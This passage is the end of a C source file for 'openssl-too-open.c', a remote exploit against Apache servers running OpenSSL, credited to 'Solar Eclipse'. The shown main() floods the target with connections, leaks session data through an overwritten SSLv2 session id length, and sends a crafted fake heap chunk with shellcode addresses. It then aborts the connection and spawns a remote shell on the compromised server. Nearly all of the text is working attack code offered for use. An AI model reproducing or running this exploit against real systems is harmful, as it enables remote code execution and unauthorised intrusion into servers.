  849.  
  850.     printf(": Usage: %s arch hostname [port] [-c N]\n", argv0);
  851.     printf("  Supported architectures:\n");
  852.     for (i=0; i<=MAX_ARCH; i++) {
  853.         printf("\t0x%02x - %s\n", i, architectures[i].desc);
  854.     }
  855.     printf("\nUse the -c option to open N connections before sending theshellcode.\n");
  856.  
  857.     exit(1);
  858. }
  859.  
  860. /* run, code, run */
  861. int main(int argc, char* argv[])
  862. {
  863.     char* host;
  864.     int port = 443;
  865.     int i;
  866.     int arch;
  867.     int N = 0;
  868.     ssl_conn* ssl1;
  869.     ssl_conn* ssl2;
  870.  
  871.     printf(": openssl-too-open.c - OpenSSL remote apache exploit\n");
  872.     printf("  by Solar Eclipse <solareclipse@phreedom.org>\n");
  873.     printf(" \n");
  874.     printf(": Private 0dd code.\n\n");
  875.  
  876.     if ((argc < 3) || (argc > 6))
  877.         usage(argv[0]);
  878.  
  879.     /* pff... use getopt next time, fool */
  880.  
  881.     sscanf(argv[1], "0x%x", &arch);
  882.     if ((arch < 0) || (arch > MAX_ARCH))
  883.         usage(argv[0]);
  884.  
  885.     host = argv[2];
  886.  
  887.     if (argc == 4)
  888.         port = atoi(argv[3]);
  889.     else if (argc == 5) {
  890.         if (strcmp(argv[3], "-c"))
  891.             usage(argv[0]);
  892.         N = atoi(argv[4]);
  893.     }
  894.     else if (argc == 6) {
  895.         port = atoi(argv[3]);
  896.         if (strcmp(argv[4], "-c"))
  897.             usage(argv[0]);
  898.         N = atoi(argv[5]);
  899.     }
  900.  
  901.     srand(0x31337);
  902.  
  903.     /* Open N connections before sending the shellcode. Hopefully this will
  904.        use up all available apache children and the shellcode will be handled
  905.        by a freshly spawned one */
  906.  
  907.     for (i=0; i<N; i++) {
  908.         printf("\rOpening connections... %d of %d", i+1, N);
  909.         fflush(stdout);
  910.         connect_host(host, port);
  911.         usleep(100000);
  912.     }
  913.  
  914.     if (N) printf("\n");
  915.  
  916.     /* Establish the first connection. Overwrite session id length, and read
  917.        the session contents in the SERVER FINISHED packet. We need the cipher
  918.        and ciphers variables from the session structure to make the shellcode
  919.        work */
  920.  
  921.     printf("Establishing SSL connection\n");
  922.     ssl1 = ssl_connect_host(host, port);
  923.     ssl2 = ssl_connect_host(host, port);
  924.  
  925.     send_client_hello(ssl1);
  926.     get_server_hello(ssl1);
  927.     send_client_master_key(ssl1, overwrite_session_id_length,sizeof(overwrite_session_id_length)-1);
  928.     generate_session_keys(ssl1);
  929.     get_server_verify(ssl1);
  930.     send_client_finished(ssl1);
  931.     get_server_finished(ssl1);
  932.  
  933.     /* The second connection uses the ciphers variable to get the shellcode
  934.        address and sends the shellcode to server */
  935.  
  936.     printf("Ready to send shellcode\n");
  937.  
  938.     port = get_local_port(ssl2->sock);
  939.     overwrite_next_chunk[FINDSCKPORTOFS] = (char) (port & 0xff);
  940.     overwrite_next_chunk[FINDSCKPORTOFS+1] = (char) ((port >> 8) & 0xff);
  941.  
  942.     /* We must overwrite s->session->cipher with its original value */
  943.     *(int*)&overwrite_next_chunk[156] = cipher;
  944.  
  945.     /* The fd and bk pointers of the fake malloc chunk */
  946.     *(int*)&overwrite_next_chunk[192] = architectures[arch].func_addr - 12;
  947.     *(int*)&overwrite_next_chunk[196] = ciphers + 16;    /* shellcode address */
  948.  
  949.     send_client_hello(ssl2);
  950.     get_server_hello(ssl2);
  951.  
  952.     send_client_master_key(ssl2, overwrite_next_chunk,sizeof(overwrite_next_chunk)-1);
  953.     generate_session_keys(ssl2);
  954.     get_server_verify(ssl2);
  955.  
  956.     /* overwrite the connection id with random bytes, causing the server to abortthe connection */
  957.     for (i = 0; i < ssl2->conn_id_length; i++) {
  958.         ssl2->conn_id[i] = (unsigned char) (rand() >> 24);
  959.     }
  960.     send_client_finished(ssl2);
  961.     get_server_error(ssl2);
  962.  
  963.     printf("Spawning shell...\n");
  964.  
  965.     sleep(1);
  966.  
  967.     sh(ssl2->sock);
  968.  
  969.     close(ssl2->sock);
  970.     close(ssl1->sock);
  971.  
  972.     return 0;
  973. }
  974.  
  975. /* EOF */
  976.